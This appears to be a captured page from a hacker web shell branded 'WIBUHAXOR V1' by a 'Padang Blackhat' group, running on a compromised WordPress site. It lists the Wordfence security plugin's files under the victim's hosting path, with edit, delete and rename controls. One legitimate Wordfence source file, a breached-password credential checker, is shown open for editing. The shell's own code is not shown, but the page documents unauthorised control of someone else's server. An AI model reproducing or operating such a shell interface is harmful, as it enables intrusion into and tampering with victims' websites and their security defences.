-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
rohihbs.com
/
wp-content
/
plugins
/
wordfence
/
lib
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
Diff
--
NONE
audit-log
--
NONE
dashboard
--
NONE
rest-api
--
NONE
.htaccess
0.346KB
Edit File
Delete File
Rename
Diff.php
5.627KB
Edit File
Delete File
Rename
IPTraf.php
1.167KB
Edit File
Delete File
Rename
IPTrafList.php
2.982KB
Edit File
Delete File
Rename
WFLSPHP52Compatability.php
1.272KB
Edit File
Delete File
Rename
compat.php
0.415KB
Edit File
Delete File
Rename
diffResult.php
2.807KB
Edit File
Delete File
Rename
email_genericAlert.php
1.389KB
Edit File
Delete File
Rename
email_newIssues.php
8.823KB
Edit File
Delete File
Rename
email_unlockRequest.php
2.341KB
Edit File
Delete File
Rename
email_unsubscribeRequest.php
1.052KB
Edit File
Delete File
Rename
flags.php
6.62KB
Edit File
Delete File
Rename
live_activity.php
0.566KB
Edit File
Delete File
Rename
menu_dashboard.php
28.156KB
Edit File
Delete File
Rename
menu_dashboard_options.php
15.37KB
Edit File
Delete File
Rename
menu_firewall.php
2.116KB
Edit File
Delete File
Rename
menu_firewall_blocking.php
10.249KB
Edit File
Delete File
Rename
menu_firewall_blocking_options.php
4.626KB
Edit File
Delete File
Rename
menu_firewall_waf.php
19.964KB
Edit File
Delete File
Rename
menu_firewall_waf_options.php
11.091KB
Edit File
Delete File
Rename
menu_install.php
1.726KB
Edit File
Delete File
Rename
menu_options.php
24.698KB
Edit File
Delete File
Rename
menu_scanner.php
21.596KB
Edit File
Delete File
Rename
menu_scanner_credentials.php
2.771KB
Edit File
Delete File
Rename
menu_scanner_options.php
8.413KB
Edit File
Delete File
Rename
menu_support.php
17.815KB
Edit File
Delete File
Rename
menu_tools.php
1.492KB
Edit File
Delete File
Rename
menu_tools_auditlog.php
16.435KB
Edit File
Delete File
Rename
menu_tools_diagnostic.php
50.801KB
Edit File
Delete File
Rename
menu_tools_importExport.php
1.279KB
Edit File
Delete File
Rename
menu_tools_livetraffic.php
39.435KB
Edit File
Delete File
Rename
menu_tools_twoFactor.php
19.6KB
Edit File
Delete File
Rename
menu_tools_whois.php
4.611KB
Edit File
Delete File
Rename
menu_wordfence_central.php
9.657KB
Edit File
Delete File
Rename
noc1.key
1.644KB
Edit File
Delete File
Rename
sysinfo.php
1.466KB
Edit File
Delete File
Rename
viewFullActivityLog.php
1.466KB
Edit File
Delete File
Rename
wf503.php
9.673KB
Edit File
Delete File
Rename
wfAPI.php
10.096KB
Edit File
Delete File
Rename
wfActivityReport.php
20.554KB
Edit File
Delete File
Rename
wfAdminNoticeQueue.php
5.198KB
Edit File
Delete File
Rename
wfAlerts.php
8.188KB
Edit File
Delete File
Rename
wfAuditLog.php
47.134KB
Edit File
Delete File
Rename
wfBinaryList.php
1.019KB
Edit File
Delete File
Rename
wfBrowscapCache.php
256.83KB
Edit File
Delete File
Rename
wfBulkCountries.php
9.768KB
Edit File
Delete File
Rename
wfCache.php
6.021KB
Edit File
Delete File
Rename
wfCentralAPI.php
25.8KB
Edit File
Delete File
Rename
wfConfig.php
124.658KB
Edit File
Delete File
Rename
wfCrawl.php
6.938KB
Edit File
Delete File
Rename
wfCredentialsController.php
10.297KB
Edit File
Delete File
Rename
wfCrypt.php
4.049KB
Edit File
Delete File
Rename
wfCurlInterceptor.php
1.022KB
Edit File
Delete File
Rename
wfDB.php
11.488KB
Edit File
Delete File
Rename
wfDateLocalization.php
352.131KB
Edit File
Delete File
Rename
wfDeactivationOption.php
2.133KB
Edit File
Delete File
Rename
wfDirectoryIterator.php
1.892KB
Edit File
Delete File
Rename
wfFileUtils.php
2.719KB
Edit File
Delete File
Rename
wfHelperBin.php
1.968KB
Edit File
Delete File
Rename
wfHelperString.php
2.129KB
Edit File
Delete File
Rename
wfIPWhitelist.php
1.559KB
Edit File
Delete File
Rename
wfImportExportController.php
3.229KB
Edit File
Delete File
Rename
wfInaccessibleDirectoryException.php
0.296KB
Edit File
Delete File
Rename
wfInvalidPathException.php
0.26KB
Edit File
Delete File
Rename
wfIpLocation.php
1.799KB
Edit File
Delete File
Rename
wfIpLocator.php
2.699KB
Edit File
Delete File
Rename
wfIssues.php
27.934KB
Edit File
Delete File
Rename
wfJWT.php
5.327KB
Edit File
Delete File
Rename
wfLicense.php
10.949KB
Edit File
Delete File
Rename
wfLockedOut.php
9.726KB
Edit File
Delete File
Rename
wfLog.php
57.376KB
Edit File
Delete File
Rename
wfMD5BloomFilter.php
5.202KB
Edit File
Delete File
Rename
wfModuleController.php
0.736KB
Edit File
Delete File
Rename
wfNotification.php
6.41KB
Edit File
Delete File
Rename
wfOnboardingController.php
9.222KB
Edit File
Delete File
Rename
wfPersistenceController.php
0.8KB
Edit File
Delete File
Rename
wfRESTAPI.php
0.368KB
Edit File
Delete File
Rename
wfScan.php
15.918KB
Edit File
Delete File
Rename
wfScanEngine.php
128.95KB
Edit File
Delete File
Rename
wfScanEntrypoint.php
1.045KB
Edit File
Delete File
Rename
wfScanFile.php
1.013KB
Edit File
Delete File
Rename
wfScanFileLink.php
0.394KB
Edit File
Delete File
Rename
wfScanFileListItem.php
0.398KB
Edit File
Delete File
Rename
wfScanFileProperties.php
1.069KB
Edit File
Delete File
Rename
wfScanMonitor.php
4.055KB
Edit File
Delete File
Rename
wfScanPath.php
1.774KB
Edit File
Delete File
Rename
wfSchema.php
11.93KB
Edit File
Delete File
Rename
wfStyle.php
1.215KB
Edit File
Delete File
Rename
wfSupportController.php
24.178KB
Edit File
Delete File
Rename
wfUnlockMsg.php
1.141KB
Edit File
Delete File
Rename
wfUpdateCheck.php
27.234KB
Edit File
Delete File
Rename
wfUtils.php
128.551KB
Edit File
Delete File
Rename
wfVersionCheckController.php
19.267KB
Edit File
Delete File
Rename
wfVersionSupport.php
0.522KB
Edit File
Delete File
Rename
wfView.php
2.216KB
Edit File
Delete File
Rename
wfViewResult.php
1.421KB
Edit File
Delete File
Rename
wfWebsite.php
1.75KB
Edit File
Delete File
Rename
wordfenceClass.php
437.986KB
Edit File
Delete File
Rename
wordfenceConstants.php
3.564KB
Edit File
Delete File
Rename
wordfenceHash.php
42.701KB
Edit File
Delete File
Rename
wordfenceScanner.php
28.092KB
Edit File
Delete File
Rename
<?php class wfCredentialsController { const UNCACHED = 'uncached'; const NOT_LEAKED = 'not-leaked'; const LEAKED = 'leaked'; const ALLOW_LEGACY_2FA_OPTION = 'allowLegacy2FA'; const DISABLE_LEGACY_2FA_OPTION = 'disableLegacy2FA'; public static function allowLegacy2FA() { return wfConfig::get(self::ALLOW_LEGACY_2FA_OPTION, false); } public static function useLegacy2FA() { if (!self::allowLegacy2FA()) { return false; } return !wfConfig::get(self::DISABLE_LEGACY_2FA_OPTION, false); } public static function hasOld2FARecords() { $twoFactorUsers = wfConfig::get_ser('twoFactorUsers', array()); if (is_array($twoFactorUsers) && !empty($twoFactorUsers)) { foreach ($twoFactorUsers as &$t) { if ($t[3] == 'activated') { $user = new WP_User($t[0]); if ($user instanceof WP_User && $user->exists()) { return true; } } } } return false; } public static function hasNew2FARecords() { if (version_compare(phpversion(), '5.3', '>=') && class_exists('\WordfenceLS\Controller_DB')) { global $wpdb; $table = WFLSPHP52Compatability::secrets_table(); return !!intval($wpdb->get_var("SELECT COUNT(*) FROM `{$table}`")); } return false; } /** * Queries the API and returns whether or not the password exists in the breach database. * * @param string $login * @param string $password * @return bool */ public static function isLeakedPassword($login, $password) { $sha1 = strtoupper(hash('sha1', $password)); $prefix = substr($sha1, 0, 5); $ssl_verify = (bool) wfConfig::get('ssl_verify'); $args = array( 'timeout' => 5, 'user-agent' => "Wordfence.com UA " . (defined('WORDFENCE_VERSION') ? WORDFENCE_VERSION : '[Unknown version]'), 'sslverify' => $ssl_verify, 'headers' => array('Referer' => false), ); if (!$ssl_verify) { // Some versions of cURL will complain that SSL verification is disabled but the CA bundle was supplied. $args['sslcertificates'] = false; } $response = wp_remote_get(sprintf(WORDFENCE_BREACH_URL_BASE_SEC . "%s.txt", $prefix), $args); if (!is_wp_error($response)) { $data = wp_remote_retrieve_body($response); $lines = explode("\n", $data); foreach ($lines as $l) { $components = explode(":", $l); $teshSHA1 = $prefix . strtoupper($components[0]); if (hash_equals($sha1, $teshSHA1)) { return true; } } } return false; } /** * Returns the transient key for the given user. * * @param WP_User $user * @return string */ protected static function _cachedCredentialStatusKey($user) { $key = 'wfcredentialstatus_' . $user->ID; return $key; } /** * Returns the cached credential status for the given user: self::UNCACHED, self::NOT_LEAKED, or self::LEAKED. * * @param WP_User $user * @return string */ public static function cachedCredentialStatus($user) { $key = self::_cachedCredentialStatusKey($user); $value = get_transient($key); if ($value === false) { return self::UNCACHED; } $status = substr($value, 0, 1); if (strlen($value) > 1) { if (!hash_equals(substr($value, 1), hash('sha256', $user->user_pass))) { //Different hash but our clear function wasn't called so treat it as uncached return self::UNCACHED; } } if ($status) { return self::LEAKED; } return self::NOT_LEAKED; } /** * Stores a cached leak value for the given user. * * @param WP_User $user * @param bool $isLeaked */ public static function setCachedCredentialStatus($user, $isLeaked) { $key = self::_cachedCredentialStatusKey($user); set_transient($key, ($isLeaked ? '1' : '0') . hash('sha256', $user->user_pass), 3600); } /** * Clears the cache for the given user. * * @param WP_User $user */ public static function clearCachedCredentialStatus($user) { $key = self::_cachedCredentialStatusKey($user); delete_transient($key); } /** * Returns whether or not we've seen a successful login from $ip for the given user. * * @param WP_User $user * @param string $ip * @return bool */ public static function hasPreviousLoginFromIP($user, $ip) { global $wpdb; $table_wfLogins = wfDB::networkTable('wfLogins'); $id = property_exists($user, 'ID') ? $user->ID : 0; if ($id == 0) { return false; } $ipHex = wfDB::binaryValueToSQLHex(wfUtils::inet_pton($ip)); $result = $wpdb->get_row($wpdb->prepare("SELECT id FROM {$table_wfLogins} WHERE action = 'loginOK' AND userID = %d AND IP = {$ipHex} LIMIT 0,1", $id), ARRAY_A); if (is_array($result)) { return true; } $lastAdminLogin = wfConfig::get_ser('lastAdminLogin'); if (is_array($lastAdminLogin) && isset($lastAdminLogin['userID']) && isset($lastAdminLogin['IP'])) { if ($lastAdminLogin['userID'] == $id && wfUtils::inet_pton($lastAdminLogin['IP']) == wfUtils::inet_pton($ip)) { return true; } return false; } //Final check -- if the IP recorded at plugin activation matches, let it through. This is __only__ checked when we don't have any other record of an admin login. $activatingIP = wfConfig::get('activatingIP'); if (wfUtils::isValidIP($activatingIP)) { if (wfUtils::inet_pton($activatingIP) == wfUtils::inet_pton($ip)) { return true; } } return false; } /** * Registers the WordPress hooks for functionality implemented by this class. */ public static function registerObservers() { add_filter('rest_dispatch_request', 'wfCredentialsController::_restAPICredentialsCheck', 99, 4); } /** * Action for the WordPress hook rest_dispatch_request to integrate with the `/users/*` actions where appropriate * and apply the strong password enforcement if needed. * * @param mixed$earlier_result * @param WP_REST_Request $request * @param string $route * @param array $handler * @return bool|WP_Error */ public static function _restAPICredentialsCheck($earlier_result, $request, $route, $handler) { /* * We're looking for the create user or update user endpoints, which currently have the $route * `/wp/v2/users`, `/wp/v2/users/(?P<id>[\d]+)`, or `/wp/v2/users/me` */ $callable = wfUtils::parseCallable($handler['callback']); if (!$callable || $callable[wfUtils::CALLABLE_CLASS] != WP_REST_Users_Controller::class || ($callable[wfUtils::CALLABLE_FUNCTION] != 'create_item' && $callable[wfUtils::CALLABLE_FUNCTION] != 'update_item' && $callable[wfUtils::CALLABLE_FUNCTION] != 'update_current_item') ) { return $earlier_result; } if ($request->has_param('password')) { $username = ''; $user = null; if ($request->has_param('id')) { $user = get_userdata((int) $request['id']); /** @var WP_User $user */ if (empty($user) || !$user->exists()) { $username = ''; $user = null; } else { $username = $user->user_login; } } else if ($request->has_param('username')) { $username = $request['username']; } $password = $request['password']; $result = self::maybePerformStrongPasswordCheck($username, $password, $user); if (is_wp_error($result)) { return $result; } $result = self::maybePerformBreachedPasswordCheck($username, $password, $user); if (is_wp_error($result)) { return $result; } } return $earlier_result; } /** * Determines whether or not to run the strong password check on the provided user info and applies it when needed. * Returns `true` if it passes, otherwise returns a WP_Error. * * @param string $username * @param string $password * @param WP_User|stdClass|null $user * @return bool|WP_Error */ public static function maybePerformStrongPasswordCheck($username, $password, $user = null) { $enforceStrongPasswds = false; if (wfConfig::get('loginSec_strongPasswds_enabled')) { if (empty($user) || ($user instanceof WP_User && !$user->exists())) { $enforceStrongPasswds = true; } else { if (wfConfig::get('loginSec_strongPasswds') == 'pubs' && user_can($user->ID, 'publish_posts')) { $enforceStrongPasswds = true; } else if (wfConfig::get('loginSec_strongPasswds') == 'all') { $enforceStrongPasswds = true; } } } if ($enforceStrongPasswds && !wordfence::isStrongPasswd($password, $username)) { return new WP_Error('pass', __('<strong>ERROR</strong>: The password provided is too weak. Please choose a stronger password and try again. A strong password will follow these guidelines: <ul class="wf-password-requirements"> <li>At least 12 characters</li> <li>Uppercase and lowercase letters</li> <li>At least one symbol</li> <li>At least one number</li> <li>Avoid common words or sequences of letters/numbers</li> </ul>', 'wordfence'), array('status' => 400)); } return true; } /** * Determines whether or not to run the breached password check on the provided user info and applies it when needed. * Returns `true` if it passes, otherwise returns a WP_Error. * * @param string $username * @param string $password * @param WP_User|stdClass|null $user * @return bool|WP_Error */ public static function maybePerformBreachedPasswordCheck($username, $password, $user = null) { $enforceBreachedPasswds = false; if (wfConfig::get('loginSec_breachPasswds_enabled')) { if (empty($user) || ($user instanceof WP_User && !$user->exists())) { $enforceBreachedPasswds = true; } else { if (wfConfig::get('loginSec_breachPasswds') == 'admins' && wfUtils::isAdmin($user->ID)) { $enforceBreachedPasswds = true; } else if (wfConfig::get('loginSec_breachPasswds') == 'pubs' && user_can($user->ID, 'publish_posts')) { $enforceBreachedPasswds = true; } } } if ($enforceBreachedPasswds && wfCredentialsController::isLeakedPassword($username, $password)) { return new WP_Error('pass', sprintf(/* translators: Support URL. */ __('Please choose a different password. The password you are using exists on lists of passwords leaked in data breaches. Attackers use such lists to break into sites and install malicious code. <a href="%s">Learn More</a>', 'wordfence'), wfSupportController::esc_supportURL(wfSupportController::ITEM_USING_BREACH_PASSWORD)), array('status' => 400)); } else if (!empty($user)) { wfAdminNoticeQueue::removeAdminNotice(false, '2faBreachPassword', array($user->ID)); wfAdminNoticeQueue::removeAdminNotice(false, 'previousIPBreachPassword', array($user->ID)); wfCredentialsController::clearCachedCredentialStatus($user); } return true; } }
Save!!!
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat